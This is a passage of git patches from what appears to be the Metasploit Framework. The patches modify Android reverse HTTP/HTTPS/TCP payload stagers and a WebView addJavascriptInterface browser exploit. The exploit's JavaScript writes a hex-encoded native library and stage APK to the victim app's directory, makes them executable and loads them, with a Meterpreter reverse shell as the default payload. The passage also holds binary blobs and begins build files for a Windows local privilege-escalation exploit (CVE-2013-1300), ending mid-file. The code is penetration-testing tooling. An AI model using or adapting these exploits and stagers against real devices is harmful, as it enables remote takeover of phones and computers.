b/modules/payloads/stagers/android/reverse_http.rb @@ -32,15 +32,14 @@ module Metasploit3 end def generate_jar(opts={}) - u = datastore['LHOST'] ? datastore['LHOST'] : String.new - raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32 - + host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new + port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s + raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32 + jar = Rex::Zip::Jar.new classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) - - string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST'] - string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + host + ":" + port) string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] jar.add_file("classes.dex", fix_dex_header(classes)) diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index 6a50fa544b..81a5b2a7a1 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -25,7 +25,6 @@ module Metasploit3 'Handler' => Msf::Handler::ReverseHttps, 'Stager' => {'Payload' => ""} )) - ] register_options( [ @@ -35,15 +34,14 @@ module Metasploit3 end def generate_jar(opts={}) - u = datastore['LHOST'] ? datastore['LHOST'] : String.new - raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32 + host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new + port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s + raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32 jar = Rex::Zip::Jar.new classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) - - string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + datastore['LHOST'].to_s) if datastore['LHOST'] - string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + host + ":" + port) string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] jar.add_file("classes.dex", fix_dex_header(classes)) From 4f31eba7f47036503f9254b1b58d83f6575a1bac Mon Sep 17 00:00:00 2001 From: Tim Date: Wed, 19 Feb 2014 15:06:11 +0000 Subject: [PATCH 054/853] android payload golf --- data/android/apk/res/drawable-mdpi/icon.png | Bin 3079 -> 0 bytes data/android/apk/res/layout/main.xml | Bin 700 -> 0 bytes modules/payloads/stagers/android/reverse_tcp.rb | 2 -- 3 files changed, 2 deletions(-) delete mode 100644 data/android/apk/res/drawable-mdpi/icon.png delete mode 100644 data/android/apk/res/layout/main.xml diff --git a/data/android/apk/res/drawable-mdpi/icon.png b/data/android/apk/res/drawable-mdpi/icon.png deleted file mode 100644 index c2e4f5634b903742c71baa0e2e080aa1ee5e2190..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3079 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 ZRGiiSHLrJh&yw#f@jh!P{3T!B%^%F5jrsrp diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index a6adcc1f77..a2ed71120c 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -43,8 +43,6 @@ module Metasploit3 files = [ [ "AndroidManifest.xml" ], - [ "res", "drawable-mdpi", "icon.png" ], - [ "res", "layout", "main.xml" ], [ "resources.arsc" ] ] From c76924e946078e98d65ae4d2084a52691702ad59 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 25 Feb 2014 00:13:18 +0000 Subject: [PATCH 055/853] native jni stager --- .../browser/webview_addjavascriptinterface.rb | 34 +++++++++++++------ 1 file changed, 24 insertions(+), 10 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 40c5461117..344403fd8e 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'DefaultOptions' => { 'PrependFork' => true }, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, @@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end + def dalvikstager() + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so') + data = File.read(localfile, {:mode => 'rb'}) + data + end + def js %Q| function exec(obj) { @@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); - var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; + var runtime = m.invoke(null, null); + var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; + var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}"; // get the process name, which will give us our data path - var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); + var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } - path += '/#{Rex::Text.rand_text_alpha(8)}'; + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; + var stagePath = path + '/stage.apk'; - // build the binary, chmod it, and execute it - m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); - m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); - m.invoke(null, null).exec([path]); + // build the library and chmod it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); + runtime.exec(['chmod', '700', libraryPath]).waitFor(); + + // build the stage, chmod it, and load it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor(); + runtime.exec(['chmod', '700', stagePath]).waitFor(); + + runtime.load(libraryPath); return true; } From 5c2168513ac32398db0b973362834b305df657ae Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Tue, 11 Mar 2014 11:03:36 -0500 Subject: [PATCH 056/853] Update path in #dalvikstager. --- .../android/browser/webview_addjavascriptinterface.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 344403fd8e..66a4251444 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -86,10 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end - def dalvikstager() - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so') - data = File.read(localfile, {:mode => 'rb'}) - data + def dalvikstager + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'libdalvikstager.so') + File.read(localfile, :mode => 'rb') end def js From 15b1a5931c866244a8af782c251b122f493bba27 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Tue, 11 Mar 2014 11:56:05 -0500 Subject: [PATCH 057/853] Remove extra resources from android reverse_http(s). --- .../payloads/stagers/android/reverse_http.rb | 12 ++++-------- .../payloads/stagers/android/reverse_https.rb | 17 +++++------------ 2 files changed, 9 insertions(+), 20 deletions(-) diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index cafd8af906..429cb06ae9 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -1,8 +1,6 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' @@ -29,8 +27,8 @@ module Metasploit3 [ OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) ], self.class) - end - + end + def generate_jar(opts={}) host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s @@ -45,8 +43,6 @@ module Metasploit3 files = [ [ "AndroidManifest.xml" ], - [ "res", "drawable-mdpi", "icon.png" ], - [ "res", "layout", "main.xml" ], [ "resources.arsc" ] ] diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index 81a5b2a7a1..a9496ebdf2 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -1,10 +1,7 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## -# require 'msf/core' require 'msf/core/handler/reverse_https' @@ -18,21 +15,20 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Dalvik Reverse HTTPS Stager', 'Description' => 'Tunnel communication over HTTPS', - 'Author' => 'anwarelmakrahy', + 'Author' => 'anwarelmakrahy', 'License' => MSF_LICENSE, 'Platform' => 'android', 'Arch' => ARCH_DALVIK, 'Handler' => Msf::Handler::ReverseHttps, 'Stager' => {'Payload' => ""} - )) + )) register_options( [ OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) ], self.class) - end - + def generate_jar(opts={}) host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s @@ -47,8 +43,6 @@ module Metasploit3 files = [ [ "AndroidManifest.xml" ], - [ "res", "drawable-mdpi", "icon.png" ], - [ "res", "layout", "main.xml" ], [ "resources.arsc" ] ] @@ -60,5 +54,4 @@ module Metasploit3 jar end - end From 679cb03ac3140f43483853807e3021c00482042e Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Tue, 11 Mar 2014 13:09:50 -0500 Subject: [PATCH 058/853] Yank armeabi-v7a bins. --- .../android/libs/armeabi-v7a/libdalvikstager.so | Bin 13436 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 data/android/libs/armeabi-v7a/libdalvikstager.so diff --git a/data/android/libs/armeabi-v7a/libdalvikstager.so b/data/android/libs/armeabi-v7a/libdalvikstager.so deleted file mode 100644 index 01f47d9a3704183e404d3e7b9ee7f8ca0276b9fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 13436 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 Date: Tue, 11 Mar 2014 19:48:39 -0500 Subject: [PATCH 059/853] Oops. Add missing dir to dalvikstager path. --- .../exploits/android/browser/webview_addjavascriptinterface.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 66a4251444..9024a454c8 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote end def dalvikstager - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'libdalvikstager.so') + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libdalvikstager.so') File.read(localfile, :mode => 'rb') end From 41720428e4a4e417d8080db3f9dbd1398e152ae8 Mon Sep 17 00:00:00 2001 From: kyuzo Date: Wed, 12 Mar 2014 10:25:52 +0000 Subject: [PATCH 060/853] Refactoring exploit and adding build files for dll. --- .../exploits/cve-2013-1300/cve-2013-1300.sln | 20 ++++ .../cve-2013-1300.cpp} | 7 +- .../cve-2013-1300/cve-2013-1300.vcxproj | 96 +++++++++++++++++++ .../exploits/cve-2013-1300/make.msbuild | 17 ++++ external/source/exploits/make.bat | 7 ++ ...schlamperei.rb => ms13_053_schlamperei.rb} | 39 +++++--- 6 files changed, 169 insertions(+), 17 deletions(-) create mode 100755 external/source/exploits/cve-2013-1300/cve-2013-1300.sln rename external/source/exploits/cve-2013-1300/{dllmain.cpp => cve-2013-1300/cve-2013-1300.cpp} (94%) create mode 100755 external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj create mode 100644 external/source/exploits/cve-2013-1300/make.msbuild rename modules/exploits/windows/local/{ms13_058_schlamperei.rb => ms13_053_schlamperei.rb} (74%) diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300.sln b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln new file mode 100755 index 0000000000..87426cc08c --- /dev/null +++ b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 11.00 +# Visual Studio 2010 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-1300", "cve-2013-1300\cve-2013-1300.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.ActiveCfg = Debug|Win32 + {C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.Build.0 = Debug|Win32 + {C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.ActiveCfg = Release|Win32 + {C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) 